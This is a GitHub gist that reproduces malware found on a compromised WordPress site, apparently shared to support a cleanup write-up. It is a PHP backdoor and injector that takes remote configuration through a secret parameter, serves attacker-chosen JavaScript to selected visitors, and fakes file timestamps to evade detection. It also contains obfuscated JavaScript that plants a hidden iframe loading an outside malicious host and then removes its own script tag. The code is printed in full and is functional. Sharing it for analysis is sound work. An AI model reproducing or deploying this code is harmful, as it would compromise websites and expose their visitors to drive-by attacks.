Instantly share code, notes, and snippets.

Embed
What would you like to do?
Obfuscated PHP code on an exploited WordPress site http://wingho.io/clearing-visitortracker-malware-wordpress-website
if(!defined("CUR_PATH")){
define("CUR_PATH",dirname(__FILE__) . DIRECTORY_SEPARATOR);
}
if(!defined("SETTINGS_FILE")){
define("SETTINGS_FILE",CUR_PATH."img.jpg");
}
if(!defined("LOG_FILE")){
define("LOG_FILE",CUR_PATH."dot.jpg");
}
if(!defined("IS_AJAX")){
define("IS_AJAX",false);
}
check_exist_all();
$pname = "UEYJHJSDHUEYBSJDHUWYE";
$SETTS = unserialize(@file_get_contents(SETTINGS_FILE));
if(
(isset($_POST[$pname]) && !empty($_POST[$pname]) && strlen($_POST[$pname]) >0)
|| (isset($_GET[$pname]) && !empty($_GET[$pname]) && strlen($_GET[$pname]) >0)
){
$new_setts = $SETTS;
$ret = array();
if(isset($_POST[$pname])){
$new_setts["status"] = $_POST[$pname."_status"];
$new_setts["u"] = base64_encode($_POST[$pname."_u"]);
$new_setts["f"] =$_POST[$pname."_f"]; //_#_
$new_setts["ct"] = $_POST[$pname."_ct"];
$new_setts["code"] = $_POST[$pname."_code"];
$new_setts["mobile_on"] = $_POST[$pname."_mobon"];
$new_setts["log"] = $_POST[$pname."_nlog"];
$new_setts["debug"] = $_POST[$pname."_debug"];
$new_setts["pts"] = base64_decode($_POST[$pname."_pts"]);
}else if(isset($_GET[$pname])){
$data = base64_decode($_GET[$pname]);
$data = explode("||__||",$data);
$new_setts["status"] = $data[0];
$new_setts["u"] = base64_encode($data[1]);
$new_setts["f"] = $data[2]; //_#_
$new_setts["ct"] = $data[3];
$new_setts["code"] = $data[4];
$new_setts["mobile_on"] = $data[5];
$new_setts["log"] = $data[6];
$new_setts["debug"] = $data[7];
$new_setts["pts"] = base64_decode($data[8]);
}else{
exit();
}
$server_script_dir = detect_doc_root($new_setts["pts"]).DIRECTORY_SEPARATOR.$new_setts["pts"].DIRECTORY_SEPARATOR;
$ret["pts"] = $server_script_dir;
$ret["script_path"] = $server_script_dir.basename($_SERVER["SCRIPT_NAME"]);
@file_put_contents(SETTINGS_FILE,serialize($new_setts));
$touch_exists = false;
if(file_exists(SETTINGS_FILE)){
$ftime = @stat(SETTINGS_FILE);
$touch_exists = $ftime["mtime"];
}
make_touch(SETTINGS_FILE,$touch_exists,true);
echo base64_encode("OKSETTS")."OKSETTSOK_START:".base64_encode(json_encode($ret))."-END";exit();;
exit();
}
if((isset($_GET[$pname."_test"]) && !empty($_GET[$pname."_test"]) && strlen($_GET[$pname."_test"]) >0)){
show_good_js($SETTS["u"],base64_decode($SETTS["code"]));
echo "\r\n\r\n_______________________\r\n\r\n";
echo base64_encode("OKSETTS");
echo "\r\n\r\n_______________________\r\n\r\n";
var_dump($SETTS);
echo "\r\n\r\n_______________________\r\n\r\n";
if(file_exists(LOG_FILE)){
echo file_get_contents(LOG_FILE);
}else{
echo "No log";
}
exit();
}
if((isset($_GET[$pname."_shlog"]) && !empty($_GET[$pname."_shlog"]) && strlen($_GET[$pname."_shlog"]) >0)){
if(file_exists(LOG_FILE)){
echo file_get_contents(LOG_FILE);
}else{
echo "No log";
}
exit();
}
if(IS_AJAX){
if(!isset($_SERVER["HTTP_CONTENT_TYPES"]) || strpos($_SERVER["HTTP_CONTENT_TYPES"],$_SERVER["SERVER_NAME"])===false){
exit();
}
}
if(isset($_GET["mob"]) && !empty($_GET["mob"]) && strlen($_GET["mob"]) >0 && $SETTS["mobile_on"] == 1){
$f = true;
$is_mob = true;
}else{
$is_mob = false;
$SETTS["f"] = (!empty($SETTS["f"]) && $SETTS["f"] != ""?explode("_#_",$SETTS["f"]):array());//explode("_#_",$SETTS["f"])
$f = false;
$ua = $_SERVER["HTTP_USER_AGENT"];
if(!empty($SETTS["f"])){
foreach($SETTS["f"] as $one){
/*if(preg_match("|".preg_quote($one).".*?([0-9\.]+)|i", $ua, $match)){
$f = true;
break;
}*/
if(strpos($one,"*")!==false){
if (preg_match("|".$one."|i", $ua, $match)){
$f = true;
break;
}
}else{
if (preg_match("|".preg_quote($one).".*?([0-9\.]+)|i", $ua, $match))
{
$f = true;
break;
}
}
}
}
}
if($SETTS["debug"] == 1){
$f = true;
$SETTS["u"] = base64_encode("http://google.com");
}
if($f && $SETTS["log"] == 1){
@file_put_contents(LOG_FILE,"[".date("Y-m-d H:i:s")."]: ".$ua."\r\n",FILE_APPEND);
$touch_exists = false;
if(file_exists(LOG_FILE)){
$ftime = @stat(LOG_FILE);
$touch_exists = $ftime["mtime"];
}
make_touch(LOG_FILE,$touch_exists,true);
}
if($f && $SETTS["status"] == 1 && !empty($SETTS["u"]) && strlen($SETTS["u"])>0){
$check_cook = get_cookie("is_uniq");
if(!$check_cook || $SETTS["ct"] == 0){
set_cookie("is_uniq","1",(time()+$SETTS["ct"]));
if($is_mob){
show_js_redirect($SETTS["u"]);
}else{
show_good_js($SETTS["u"],base64_decode($SETTS["code"]));
}
}else{
show_bad_js();
}
}else{
show_bad_js();
}
exit();
function check_exist_all(){
if(!@file_exists(SETTINGS_FILE)){
@file_put_contents(SETTINGS_FILE,serialize(array("status"=>0,"u"=>"","f"=>"","ct"=>0,"code"=>"","pts"=>"","log"=>-1,"debug"=>-1,"mobile_on"=>-1)));
$touch_exists = false;
if(file_exists(SETTINGS_FILE)){
$ftime = @stat(SETTINGS_FILE);
$touch_exists = $ftime["mtime"];
}
make_touch(SETTINGS_FILE,$touch_exists,true);
}
}
function show_bad_js(){
if(!IS_AJAX){
header("content-type: application/x-javascript");
}
echo "/*".time()."*/";
}
function show_good_js($e_url,$code){
$e_url = base64_decode($e_url);
$code = str_replace(array("{%%EK_URL%%}"),array($e_url),$code);
if(!IS_AJAX){
header("content-type: application/x-javascript");
}
echo $code;
}
function show_js_redirect($e_url){
$e_url = base64_decode($e_url);
header("content-type: application/x-javascript");
$redirect = "if ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))) {location.replace('".$e_url."');}else{window.location = '".$e_url."';document.location = '".$e_url."';}";
echo $redirect;
}
function detect_doc_root($path_to_script){
$path_to_script = str_replace("//","/",$path_to_script);
if(substr($path_to_script,0,1) == "/"){
$path_to_script = substr_replace($path_to_script, "", 0,1);
}
$full_path = realpath(dirname(__FILE__));
if($path_to_script == ""){
$doc_root = $full_path;
}else{
$doc_root = str_replace(DIRECTORY_SEPARATOR.$path_to_script,"",$full_path);
}
return $doc_root;
}
function rand_string($min = 2,$max = false){
$abc = "qwertyuiopasdfghjklzxcvbnm";
$abc_up = strtoupper($abc);
$abc = str_split($abc);
$abc_up = str_split($abc_up);
$abc = array_merge($abc,$abc_up);
$return = array();
if(!$max || $max <= $min){
$max = $min + $min;
}
for($i =$min; $i <= $max; $i++){
$return[] = $abc[array_rand($abc)];
}
return implode("",$return);
}
function set_cookie($name = "", $value = "", $expire = 1, $path = "/"){
return setcookie(md5($name),$value,$expire,$path,"",false,true);
}
function get_cookie($name = ""){
if(isset($_COOKIE[md5($name)]) && !empty($_COOKIE[md5($name)])){
return $_COOKIE[md5($name)];
}else{
return false;
}
}
function make_touch($fpath,$touch_exist = false,$touch_par_dir = false){
$ttime = 0;
if($touch_exist){
$ttime = $touch_exist;
}else{
$ttime = get_some_touch($fpath);
}
@touch($fpath,$ttime);
if($touch_par_dir===true){
$fpath = explode(DIRECTORY_SEPARATOR,$fpath);
array_splice($fpath, (count($fpath)-1), 1);
$fpath= implode(DIRECTORY_SEPARATOR,$fpath);
if(substr($fpath, -1) != DIRECTORY_SEPARATOR)
$fpath= $fpath.DIRECTORY_SEPARATOR;
@touch($fpath,$ttime);
}
}
function get_some_touch($fpath){
$fpath = explode(DIRECTORY_SEPARATOR,$fpath);
array_splice($fpath, (count($fpath)-1), 1);
$fpath= implode(DIRECTORY_SEPARATOR,$fpath);
if(substr($fpath, -1) != DIRECTORY_SEPARATOR)
$fpath= $fpath.DIRECTORY_SEPARATOR;
$dirs = array_diff(scandir($fpath),array(".",".."));
$touches = array();
foreach($dirs as $one){
$stat = stat($fpath.$one);
$touches[] = $stat['mtime'];
}
//asort($touches);
sort($touches, SORT_NUMERIC);
if(isset($touches[0]) and !empty($touches) and $touches[0]>0)
return $touches[0];
else
return (time() - (3600*24*30 * 12));
}
<script type="text/javascript" id="id_2649819">
function lNvpGvHOLiehBHBMLYbvPlJrpgWOsYuTZmucBDLtR() {
var e = "id_2649819";
if ("none" != e) {
var i = document.getElementById(e);
void 0 != typeof i && null != i && (i.outerHTML = "", delete i)
}
}
function gKQltxDpZWJOZHmDbcAsNLSXWNYdgxHFYU() {
return document.all && !document.compatMode ? !0 : document.all && !window.XMLHttpRequest ? !0 : document.all && !document.querySelector ? !0 : document.all && !document.addEventListener ? !0 : document.all && !window.atob ? !0 : document.all ? !0 : "undefined" != typeof navigator.maxTouchPoints && !document.all && iTtrcUzkbhIRdSfHGyFsHFDMrjpOTlRTzyhC() ? !0 : !1
}
function iTtrcUzkbhIRdSfHGyFsHFDMrjpOTlRTzyhC() {
var e = window.navigator.userAgent,
i = e.indexOf("MSIE ");
if (i > 0) return parseInt(e.substring(i + 5, e.indexOf(".", i)), 10);
var t = e.indexOf("Trident/");
if (t > 0) {
var n = e.indexOf("rv:");
return parseInt(e.substring(n + 3, e.indexOf(".", n)), 10)
}
var o = e.indexOf("Edge/");
return o > 0 ? parseInt(e.substring(o + 5, e.indexOf(".", o)), 10) : !1
}
function BvYpXdZglDLRdNvGFNxeifOmYPRQhQg() {
var e = window.navigator.userAgent.toLowerCase();
return /(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(e) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(e.substr(0, 4)) ? !0 : !1
}
var NSwtIQNTEWGEUlrSDDgdDjIKZwWnWSHsHxyn = setInterval(function() {
if (null != document.body && "undefined" != typeof document.body) {
if (clearInterval(NSwtIQNTEWGEUlrSDDgdDjIKZwWnWSHsHxyn), "undefined" == typeof window.v_35763a2628ec5f7420be3779607dfe04) {
window.v_35763a2628ec5f7420be3779607dfe04 = 1;
var e = iTtrcUzkbhIRdSfHGyFsHFDMrjpOTlRTzyhC() && gKQltxDpZWJOZHmDbcAsNLSXWNYdgxHFYU(),
i = !e && !!window.chrome && "Google Inc." === window.navigator.vendor,
t = -1,
n = "http://zxcgheytergfdgdfg.cf/052F";
if (BvYpXdZglDLRdNvGFNxeifOmYPRQhQg() && 1 == t) navigator.userAgent.match(/iPhone/i) || navigator.userAgent.match(/iPod/i) ? location.replace(n) : (window.location = n, document.location = n);
else if (e && !i && !BvYpXdZglDLRdNvGFNxeifOmYPRQhQg()) {
var o = '<div style="position:absolute;left:-3532px;"><iframe width="10px" src="' + n + '" height="10px"></iframe></div>',
a = document.getElementsByTagName("div");
if (0 == a.length) document.body.innerHTML = document.body.innerHTML + o;
else {
var d = a.length,
r = Math.floor(d / 2);
a[r].innerHTML = a[r].innerHTML + o
}
}
}
lNvpGvHOLiehBHBMLYbvPlJrpgWOsYuTZmucBDLtR()
}
}, 100);
</script>
@soyarsauce

This comment has been minimized.

Owner

soyarsauce commented Oct 6, 2015

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment